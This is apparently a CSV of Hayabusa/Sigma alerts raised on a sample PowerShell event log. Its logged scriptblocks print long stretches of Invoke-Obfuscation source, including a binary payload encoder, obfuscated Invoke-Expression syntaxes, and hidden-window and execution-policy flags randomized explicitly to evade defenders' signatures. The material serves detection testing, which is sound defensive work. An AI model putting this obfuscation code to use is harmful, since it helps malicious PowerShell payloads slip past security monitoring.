$InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) 